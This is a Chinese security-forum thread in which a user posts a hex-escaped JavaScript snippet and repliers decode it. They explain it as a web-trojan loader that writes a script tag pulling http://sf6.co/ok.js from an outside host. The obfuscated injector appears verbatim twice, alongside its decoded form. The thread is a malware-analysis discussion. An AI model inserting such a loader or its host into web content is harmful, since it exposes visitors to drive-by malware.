瑞星卡卡安全论坛

调用的代码加密了

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x73\x66\x36\x2e\x63\x6f\/\x6f\x6b\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");

也不知道用干什么软件加的，谁知道这是怎么加密的，用的什么软件

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

楼主你好。您提供的代码可能在被解密前是和shellcode网马具有相同的特征（特别说明：楼主您提供的代码并不是shellcode形式，可能是解密shellcode或alph2加密代码之后形成的中间代码）；我把您贴上的代码复制到了FreShow工作区域中，经过一次esc解密即可看到最终的网马地址，如下图（该网址由于后缀名为.js，其实是一个javascript脚本，需要继续解密才能得到最终的网马地址）：

附件: 网马加密.png

只学工具,不懂原理,你见过这样的shellcode?

额。。不好意思，可能是我表述得不清楚，我的意思并不是说楼主提供的代码是shellcode，而是说可能是shellcode经过一次esc解密之后形成的中间代码，至于该中间代码（即楼主提供的代码）的加密形式，还请大师您为我们解读。如果我之前的表述造成了楼主的误解，敬请谅解！（原回复已加上“特别说明”）

楼主你好，通过查阅相关资料，您提供的代码是通过16进制进行的简单加密，\x64就是十六进制的64，对应于十进制的100，通过ASCII表转换字符是d，依次类推，可以得到下面的结果：
window["document"]["writeln"]("<script type="text/javascript"src=" http://sf6.co/ok.js"><script>");

你这段代码只是javascript中的一部分吧，可以用alert法转换一下就知道答案了
<script>alert
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x73\x66\x36\x2e\x63\x6f\/\x6f\x6b\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
</script>


<script>alertwindow["document"]["writeln"]("<script type="text/javascript" src="http://sf6.co/ok.js"></script>");
</script>


这个没加密只是用16进制转换了一下。。。。。。。